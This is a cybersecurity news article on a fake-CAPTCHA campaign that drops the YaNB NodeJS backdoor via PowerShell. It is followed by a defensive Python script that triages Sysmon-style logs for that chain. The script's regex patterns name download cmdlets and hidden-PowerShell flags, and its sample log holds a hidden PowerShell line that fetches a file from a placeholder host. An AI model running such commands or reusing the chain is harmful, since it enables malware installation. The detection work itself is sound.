A sophisticated malware campaign has emerged that deploys stealthy NodeJS backdoors through deceptive CAPTCHA verification screens, security researchers revealed today. This campaign represents a growing trend of threat actors exploiting seemingly legitimate security measures to distribute malicious code, targeting users who are accustomed to completing CAPTCHA challenges during their regular online activities. When users attempt to complete these CAPTCHA challenges, malicious PowerShell commands are covertly executed in the background, installing a NodeJS-based backdoor that provides attackers with persistent access to the victim’s system.

The backdoor, dubbed YaNB (Yet Another NodeJS Backdoor), demonstrates advanced capabilities including system reconnaissance, command execution, and data exfiltration. The researchers also observed a resurgence in similar NodeJS-based backdoor deployments across multiple malware campaigns, including KongTuke, Fake CAPTCHA schemes, Mispadu, and Lumma stealers.

The infection chain starts on compromised websites. These sites contain injected malicious code that loads JavaScript files, eventually leading victims to fake CAPTCHA verification pages. When users visit these compromised sites, the injected script performs initial reconnaissance by collecting system information including operating system details, IP address, browser type, and geolocation data. The user, believing they are completing a legitimate security verification, triggers a PowerShell command that downloads and installs Node.js and executes the backdoor. This backdoor employs sophisticated anti-VM techniques to evade analysis, checking for system characteristics that might indicate a virtual environment, such as memory size and computer name patterns.

“Given the effectiveness and high success rates of fake CAPTCHA techniques as an initial access vector compared to traditional methods, we anticipate continued growth and prevalence of these tactics,” noted the Trustwave report.
The NodeJS backdoor uses a custom XOR-based encryption mechanism for command and control communications and establishes persistence through registry modifications, disguising itself as a legitimate browser update service. Once fully operational, the malware can deploy additional payloads, including more advanced NodeJS RATs capable of tunneling malicious traffic through SOCKS5 proxies. As this campaign continues to evolve, organizations and users should remain vigilant when encountering CAPTCHA challenges, particularly on less familiar websites.
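The chain described above (a PowerShell command launched from the Run dialog, a Node.js runtime dropped under the user profile, and a Run-key autorun named after a browser updater) leaves a recognisable trail in endpoint telemetry. The script below is an added, defender-side triage example written for this page; it is not code from Trustwave or from the article. The pipe-delimited event format, the heuristic names, the file paths and the Run-key value name `ChromeUpdateService` are all constructed for the example and are not indicators from the report.

```python
"""
Triage constructed Sysmon-style events for the fake-CAPTCHA -> PowerShell ->
Node.js backdoor chain. Added example: log layout, paths and value names are
constructed (assumption), not indicators from the Trustwave report.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    ts: str
    kind: str      # "proc" = process creation, "reg" = registry value set
    parent: str    # parent image (proc) or writing process (reg)
    image: str     # created image (proc) or registry target (reg)
    detail: str    # command line (proc) or value data (reg)


def parse_line(line: str) -> Event:
    """Parse one 'ts | kind | parent | image | detail' line (constructed format)."""
    ts, kind, parent, image, detail = (p.strip() for p in line.split("|", 4))
    return Event(ts, kind, parent, image, detail)


# Heuristics for the stages the article describes: a shell spawned by
# explorer.exe (where a Run-dialog paste lands), download cmdlets, hidden or
# encoded invocation, Node.js from a user-writable path, and a Run-key autorun
# that points at node.exe or carries a browser-updater-style name.
SHELL = re.compile(r"(powershell|pwsh)\.exe$", re.I)
DOWNLOAD = re.compile(r"(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile|curl|wget)", re.I)
HIDDEN = re.compile(r"-(w(indowstyle)?\s+hidden|nop|noprofile|enc|encodedcommand)", re.I)
USER_PATH = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|temp)\\", re.I)
NODE = re.compile(r"node\.exe", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run\\", re.I)
BROWSER_UPDATE = re.compile(r"(chrome|edge|firefox|brave|browser).*update", re.I)


def score_event(ev: Event) -> list[str]:
    """Return the list of heuristic names this single event triggers."""
    hits = []
    if ev.kind == "proc":
        if SHELL.search(ev.image) and ev.parent.lower().endswith("explorer.exe"):
            hits.append("shell-from-explorer")
        if SHELL.search(ev.image) and DOWNLOAD.search(ev.detail):
            hits.append("shell-download")
        if SHELL.search(ev.image) and HIDDEN.search(ev.detail):
            hits.append("shell-hidden-or-encoded")
        if NODE.search(ev.image) and USER_PATH.search(ev.image):
            hits.append("node-from-user-path")
    elif ev.kind == "reg":
        if RUN_KEY.search(ev.image) and NODE.search(ev.detail):
            hits.append("run-key-node")
        if RUN_KEY.search(ev.image) and BROWSER_UPDATE.search(ev.image):
            hits.append("run-key-browser-update-name")
    return hits


def triage(lines):
    """Return (ts, image, hits) for every event that matched at least one heuristic."""
    out = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        hits = score_event(ev)
        if hits:
            out.append((ev.ts, ev.image, hits))
    return out


# The three stages that, seen together, reproduce the reported infection chain.
CHAIN = ("shell-download", "node-from-user-path", "run-key-node")


def chain_detected(results) -> bool:
    """True when every stage of the chain appears among the flagged events."""
    seen = {h for _, _, hits in results for h in hits}
    return all(stage in seen for stage in CHAIN)


# Constructed sample telemetry: three events of the chain plus two benign ones.
SAMPLE_LOG = """
2025-05-02T12:00:01Z | proc | C:\\Windows\\explorer.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell -w hidden -nop -c "iwr hxxp://example.invalid/n.zip -OutFile $env:TEMP\\n.zip"
2025-05-02T12:00:09Z | proc | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | C:\\Users\\alice\\AppData\\Roaming\\nodejs\\node.exe | node.exe C:\\Users\\alice\\AppData\\Roaming\\nodejs\\main.js
2025-05-02T12:00:10Z | reg | C:\\Users\\alice\\AppData\\Roaming\\nodejs\\node.exe | HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ChromeUpdateService | C:\\Users\\alice\\AppData\\Roaming\\nodejs\\node.exe C:\\Users\\alice\\AppData\\Roaming\\nodejs\\main.js
2025-05-02T12:05:00Z | proc | C:\\Windows\\explorer.exe | C:\\Program Files\\Notepad++\\notepad++.exe | notepad++.exe notes.txt
2025-05-02T12:06:00Z | proc | C:\\Windows\\System32\\services.exe | C:\\Program Files\\nodejs\\node.exe | node.exe server.js
"""

if __name__ == "__main__":
    results = triage(SAMPLE_LOG.splitlines())
    for ts, image, hits in results:
        print(ts, image, hits)
    print("full chain observed:", chain_detected(results))
```

The individual heuristics are deliberately noisy on their own (a legitimate Node.js service installed under Program Files and launched by services.exe matches nothing, but a developer running `iwr` from a Run-dialog PowerShell will trip two of them); the `chain_detected` check is what turns them into a higher-confidence alert, since it requires the download shell, the user-profile Node.js process and the Run-key autorun to appear together.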
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 02 May 2025 12:05:07 +0000